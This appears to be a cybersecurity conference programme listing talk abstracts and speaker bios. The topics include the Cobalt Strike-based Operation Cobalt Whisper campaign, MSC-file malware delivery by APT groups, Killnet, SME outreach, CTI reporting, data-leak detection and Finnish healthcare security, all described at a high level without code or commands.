A new campaign targeting various industries such as the Defense Sector in Pakistan and predominantly researchers from Hong Kong has been uncovered. Tracked as Operation Cobalt Whisper, the entire campaign heavily leverages the use of a post-exploitation tool Cobalt Strike, which is deployed using obfuscated VBScript. A total of 20 infection chains have been identified along with additional individual samples, where 18 of them targeted Hong Kong and have two targeted Pakistan where over 30 decoy files have been identified.In this talk, we will explore the technical details of one of the campaigns we encountered during our initial analysis and examine the various stages of the infection chain, starting with a deep dive into the decoy documents. We will then investigate the common Tactics, Techniques, and Procedures (TTPs), such as the use of malicious VBScript and LNK payloads employed by this threat actor across most campaigns. These methods facilitate the in-memory execution of the Cobalt Strike implant, which is delivered alongside these lures in an archive file. At the end, we will explore hunting of its infrastructure that leads us to multiple host-headers of Cobalt Strike beaconing from Chinese ASN and correlation with Bitter APT.

The talk will be presented by Sophie Horgan, Senior Communication and Engagement Advisor NCSC. Sophie joined CERT NZ (now NCSC) over four years ago and prior to that worked with the organisation on media relations and incident response. Throughout that time, she has gained a great deal of knowledge through working with stakeholders such as media, SMEs and general public who look at cyber security through a different lens than those working in the field. This helped Sophie understand how we bring our knowledge and insight to SMEs in a way that is digestible and fit for purpose.

Small to medium enterprises (SMEs) are an important part of the worldwide economy. Good cyber security practices are an integral part of keeping SMEs secure and running their business practices smoothly.However significant numbers of SMEs are not meeting best practice cyber security standards. In New Zealand less than half of SMEs would describe their organisation as prepared for a cyber attack. In Australia, 43% of cyber crime targets small business. Research tells us that while SMEs are aware and concerned, competing priorities and lack of knowledge or time stops action. How do we make cyber security simpler, more accessible and easier for SMEs to action? How do we get them to make it a priority? We know from international engagement that this is a problem faced by agencies worldwide working to support SMEs.The Nation Cyber Security Centre (NCSC) has developed and produced a video series designed to engage with businesses at their level, along side simple resources they could use to continue their cyber security journey.

Hossein Jazi is a senior threat intelligence specialist at Fortinet, where he contributes as an active researcher with interests in APT tracking, malware analysis, cyber threat intelligence, and machine learning. His current efforts are centred on identifying and monitoring APT activities, along with publishing insightful blogs on their operations. In addition to these projects, Jazi is focused on developing proactive techniques to monitor cyber threat actors' actions and collaborating with various partners to enhance cyber threat research capabilities. He holds a Master's degree in computer science and has over 14 years of experience specializing in cybersecurity and APT analysis.

With more than two decades of experience in the cybersecurity field, I possess a unique blend of sales soft skills and deep technical acumen, making me a well-rounded individual who is at ease working in both technical and non-technical environments. My keen understanding of the cyber threat landscape allows me to communicate potential threats and vulnerabilities, as well as complex security issues and possible countermeasures, to any audience with ease.

Currently, my focus is on developing innovative ways to advance the state of the art in cyber threat intelligence, while managing a team of researchers and engineers. Our goal is to identify new attack vectors and develop proactive intelligence to protect against them. To help me achieve this mission, I am driving our partnership with MITRE CTID and participating in projects that are augmenting the state of the art when it comes to threat intelligence standards, tools, and response. We are also deploying these tools and standards across Fortinet's products and systems.

My vast experience, technical expertise, and communication skills have enabled me to excel in the cybersecurity industry, and I look forward to continuing to drive innovation and progress in this field.

As the cyber threat landscape evolves, so do the tactics employed by advanced persistent threats (APTs). With the increasing disablement of macros in Microsoft Office, threat actors have adapted, turning to new methods for malware delivery over recent years. Since early 2022, there has been a noticeable shift away from traditional macro-based attacks toward techniques involving ISO files, HTML smuggling, LNK files, and CHM files. Among these methods, the use of Microsoft Common Console (MSC) files remains underexplored yet has emerged as a powerful tool for malware delivery and persistence in Windows environments.Although initially limited in use, MSC files began gaining significant traction among threat actors in early 2024. Kimsuky was one of the first groups to incorporate MSC files into its campaigns, leveraging various techniques to target victims. Recently, Kimsuky expanded its MSC-based attacks by using Zoom-themed lures, incorporating the legitimate Zoom application to add credibility and increase engagement. Following Kimsuky's example, other APT groups- including Mustang Panda, APT41, and APT Bitter- have adopted MSC files as part of their initial infection strategies. Some of these APTs combine novel methods like Grim Resource Injection and AppDomain Manager Hijacking to enhance the efficacy and stealth of their attacks.These attacks, which use legitimate Windows subsystems and tools to deliver malicious payloads, pose significant challenges for detection. Traditional enterprise security solutions often focus on identifying the aftermath of these techniques- such as the loading of malicious code into legitimate Windows processes- rather than the techniques themselves. Current EDR tools generally provide limited visibility into the full attack chain and tend to rely on known malicious payload signatures or newer detection methods, such as stack-based similarity hashing, to detect frameworks like Sliver, Cobalt Strike, and Metasploit.This technical deep dive will explore how APT groups are exploiting the hidden capabilities of MSC files to conduct stealthy, sophisticated attacks. We'll provide a timeline of MSC file adoption by various threat actors and examine the structure of weaponized MSC files, focusing on advanced techniques like Grim Resource Injection and AppDomain Manager Hijacking, which enable malicious code execution in .NET environments. Recent campaigns demonstrate how APTs are increasingly using these novel techniques to expand their toolsets and evade modern security controls. We'll also discuss detection challenges, showcase a demo of these methods in action, and highlight their implications for current detection mechanisms.

Alex Holden is the founder and CISO of Hold Security, LLC. Under his leadership, Hold Security played a pivotal role in information security and threat intelligence, becoming one of the most recognizable names in its field. Mr. Holden researches minds and techniques of cyber criminals and helps our society to build better defenses against cyber-attacks.

The Russian infamous hacktivist group Killnet is more than meets the eye; it's a cyber army directed by a few to cause harm. With a checkered history and inconsistent behaviors, deciphering who is behind this group is challenging. Nevertheless, we will lift this veil and share a personal story of disrupting the group, unbalancing Killnet into chaos.

As Director of Jersey Cyber Security Centre (JCSC), Matt leads national cyber defence for the island of Jersey, overseeing the direction of the CSIRT in order to promote and improve cyber resilience across critical national infrastructure, businesses, communities, and citizens. A former Chief Information Security Officer for fortune 500 companies and some of the world's leading financial institutions, Matt became the first Director of JCSC in 2021. He is a FIRST liaison member. Matt is also the co-founder of the Channel Islands Information Security Forum and a Commissioner of Jersey's Financial Regulator, the JFSC.

From bombings to floods and fires, real-world emergencies often demand rapid, effective responses under pressure. These scenarios present lessons that can significantly benefit the cybersecurity incident response community. Matt Palmer will explore how a series of life-and-death crises inspired the Jersey Cyber Security Centre (JCSC) to align its approach with emergency management principles and practices from civil defence and emergency services. By examining parallels between physical and cyber incidents, he will share actionable steps that security teams can take to adopt these best practices, build collaboration, and improve outcomes.

Chris Horsley is the CTO and one of the co-founders of Cosive, a cybersecurity and CTI specialist consultancy based in Australia and New Zealand with a particular focus on security operations, IR, CTI practices, and tooling. He also enjoys experimenting with LLMs and CTI data formats like STIX and MISP and how to visualise and represent CTI concepts better.

He also has a long background in the international CSIRT community, which spanned roles including open source intelligence gathering, vulnerability disclosure handling, software and tooling development, malware analysis, and joint initiatives for national CSIRTs. Chris has previously worked as a security analyst for AusCERT, the national CSIRT at that time, and JPCERT/CC, the Japanese national CSIRT.

Cyber threat intelligence (CTI) attracts a lot of fancy frameworks and terminology, often coming from military intelligence. In spite of this, we often see CTI packages in feeds and sharing communities listing a few IPs addresses with very little context about their exact nature. If we find one of these IPs in our environment, so what? Will the CTI report tell us what we're dealing with?Let's get back to fundamentals and remove all the specialist language: what makes a CTI report actually useful? What does it need to do and who are we writing it for?There's something we all learned in primary school English classes that can help us write better CTI reports: how to write a newspaper article. If we get into the headspace of a reporter verifying their sources, thinking about their audience, and including the who, what, when, where, why, and how translated into cyber threats, we can improve the standard of CTI packages than a lot of what we see shared today.In this presentatation, we'll use this approach from first principles for making better CTI packages using MISP and STIX as well as something better for the humans in our constituency.

Braxton Plaxco is a Principal Security Software Engineer on Red Hat's Information Security Incident Response team and has been a member of FIRST's Automation SIG. He leads Red Hat's InfoSec Developer Team which is formed from members across the organization to build custom tooling and automation to help the Information Security team scale, reduce human error, and focus on its core objectives.

This case study delves into the lessons learned from Red Hat's efforts to detect, mitigate, and prevent data leaks not only on GitHub but also across a myriad of highly distributed sources. It all began with an internal monitoring solution, which subsequently evolved into a comprehensive architecture designed to tackle leaks at scale. The project has proven instrumental in saving considerable time and effort for our Incident Response analysts, significantly compressing the timeframe from data exposure to its successful mitigation. Furthermore, it has given rise to new tools aimed at preventing the initial exposure of sensitive data. Presently, our capability to detect leaks has reached a level where we often outpace the bad guys and preemptively avert potentially expensive incidents all together. We invite you to join us for an overview of the architecture and a preview of our upcoming open-source release to learn how you can do it too!

Mr Perttu Halonen, senior specialist, the National Cyber Security Centre Finland (NCSC-FI). Perttu has worked as healthcare cyber security liaison at the NCSC-FI since 2017, and facilitates the operation of Finnish social services and healthcare information sharing and analysis centre SOTE-ISAC.

Healthcare cyber security is a major topic, especially because of proliferation of ransomware, and cyber criminals deliberately targeting such attacks against healthcare delivery organisations. Meanwhile, Finnish healthcare providers are doing surprisingly well in terms of ransomware incidents: none reported since the year 2017. It's not clear why is it so. Ransomware incidents have become commonplace in Finnish society, and the good situation in healthcare stands out even inside Finland. In this presentation we study which kind of cyber security challenges do Finnish healthcare providers face, how is cyber security managed in the Finnish healthcare system, and how does the Finnish way compare to approaches in some other European countries. The presentation provides useful insights for policymakers, national level CSIRTs and cyber security managers.